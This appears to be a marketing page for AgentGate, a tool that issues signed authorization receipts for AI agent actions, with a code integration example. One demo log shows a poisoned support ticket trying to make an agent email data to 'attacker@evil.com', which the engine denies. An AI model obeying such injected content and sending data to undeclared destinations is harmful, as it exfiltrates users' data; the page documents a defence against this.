Every agent action, provable to someone who wasn't there.
If your agent is sitting in security review because nobody can show what it will do, this is the missing artifact. It asks before it acts and gets back a receipt — who authorized this, what exactly, under what information flow — and your reviewer checks it themselves, offline, with a public key and no access to your systems.
Ed25519, offline, public key — the holder cannot forge one
on the wire
130 ms median to authorize, 0 ms to check the binding
integration
One decorator. Python and TypeScript, MIT licensed.
receipt · 3ebe7a0cBinding mismatch
decision
PERMIT
agent
pay_bot
action
transfer · /payments/outbound
EURtry 25000.00
authorizedcomputing…
about to runcomputing…
Nothing here is recorded or simulated. The digest is recomputed in your browser with the same SHA-256 and the same canonicalization the server uses.
What it refuses
A policy engine asks whether an action may run.
What stops exfiltration is whether this data may reach this destination. Every line below is transcribed from the engine, not written for the page.
A poisoned ticket cannot re-address the reply
prompt injection
read /tickets/8842.txt PERMIT integrity -> UNTRUSTED session now carries content the agent did not authorsend /outbox/reply.txt to customer@ourcompany.com PERMIT destination was declared at registrationsend /outbox/reply.txt to attacker@evil.com DENY FLOW_VIOLATION:INTEGRITY:UNDECLARED_DESTINATION this send is addressed to 'attacker@evil.com', which the agent never declared, and its session carries content it did not author
Your agent works. It has been in security review for six weeks.
The engineering is done. What is not done is the part where someone has to sign that this thing can touch production data, and they cannot sign it because nobody can show them what the agent will do — or prove what it did.
That is not a technology gap. Enforcement exists, and most of it is free. It is an evidence gap: 67% of organizations running agents have no audit trail their own reviewers would accept, and the agent stays blocked while the quarter it was meant to affect goes by.
01
Your agent, instrumented
Every consequential action it takes goes through authorization and comes back with a receipt. We do the integration with your team, on your agent, not a sample one.
02
The evidence pack
A session of your agent working, every decision sealed, and the verifier your reviewer runs themselves. They check it offline with a public key and no access to your systems.
03
The written answer
What the agent may do, what it may never do, what happens when it is compromised, and how each of those is enforced rather than promised. In the form a review committee accepts.
We are taking a small number of these while the product is early. Scope and terms on the call — we would rather understand your review first than quote you a package you do not need.
Integrating
One decorator, and every argument is bound.
On each call it authorizes with the full operation, recomputes the digest locally before dispatch, spends the receipt, then runs the body. If anything changed in between, the body does not run.
Binding every argument is the default because the alternative is the bug. A transfer(account, amount, recipient) guarded only on account authorizes any amount to anyone — the confused-deputy gap that arXiv 2606.28679 pins on LangChain, LlamaIndex and the Stripe Agent Toolkit.
You are probably also looking at three other things.
They are good, they are well funded, and they solve different problems. AgentGate composes with them rather than replacing them — it takes a decision, from us or from anyone, and turns it into something a third party can check.
layer
who
answers
what it leaves open
Inventory and posture
Cyera · Noma · Zenity
Which agents exist, what they can reach, what looks risky.
Discovers and classifies. Does not stop an action.
Agent identity
Okta · Entra Agent ID · CyberArk
Who this agent is and what credentials it holds.
Says nothing about what the agent does with that identity.
Gateways
Runlayer · Obot · MintMCP
Whether this tool may be called at all.
Gates the tool, never the argument values passed to it.
Pre-action policy
APort / OAP · Permit.io
Whether this action may execute, against declared policy.
Decides. Nothing binds the decision to what actually ran.
Evidence
AgentGate
Whether the data may reach this destination — and what was authorized, provably.
Session-grained flow, not value-grained. Stated in full on the how-it-works page.
Every row above produces a log. None of them produces an artifact your auditor can verify without trusting the vendor that wrote it. That is the row we are in.
Why now is not a forecast
The obligation is already in force.
Article 12 of the EU AI Act applied from 2 August 2026: automatic recording of events across the lifecycle, and under Article 26 the deployer keeps those logs for at least six months. Up to €15M or 3% of worldwide turnover.
12%
of IT leaders say they can actually govern the agents they have deployed, against 51% who have agents in production.
OutSystems, 1,900 respondents
40%
of enterprises will demote or decommission an autonomous agent by 2027 over governance gaps found after an incident.
Gartner
6 months
minimum retention on the deployer, and a log written after the fact by the system being questioned is not what an auditor is asking for.
EU AI Act, Article 26
Insurers arrived at the same requirement from the other side. AIUC-1 now operates as a managing general agent with Beazley paper, and what they ask for is proof, at claim time, that you did what you said you did. A receipt sealed before the action answers that. A log assembled afterwards does not.
Read by people building the same thing
No customer logos yet. This is what we have instead.
We are studying AgentGate closely — the Merkle-chained artifact approach is a compelling pattern for high-stakes agent actions.
Kirill (Fenix)author, ATAP — the open agent trust protocol
ATAP shipped v0.3.1 and then v0.3.2 in the same discussion thread, folding in the pre-execution sealing approach.
The pre-execution evidence framing is interesting — especially the distinction between authorization evidence that exists before consequence versus audit logs assembled afterward.
Dale Chouagent governance researcher
Works with your existing stack
Drop-in integration. No framework changes. No rewrites.
from agentgate import AgentGategate = AgentGate("https://agentgate.internal", api_key=API_KEY)gate.register( "billing-agent", "Billing agent", "Settle approved supplier invoices", authorized_resources=["/payments/*"], authorized_actions=["transfer"], # Declared before any content arrives, which is what makes it mean # something: a session carrying material the agent did not author # does not get to choose where data goes. allowed_destinations=["acct_9931", "acct_4402"],)# Every argument is bound into the authorization, so the receipt covers# this amount to this recipient - not "a transfer". Authorize, check the# binding at dispatch, redeem the receipt, then run.@gate.guard("transfer", resource_arg="account")def transfer(account: str, amount_minor: int, recipient: str): return payments.create(account, amount_minor, recipient)transfer("/payments/outbound", 25_000, "acct_9931")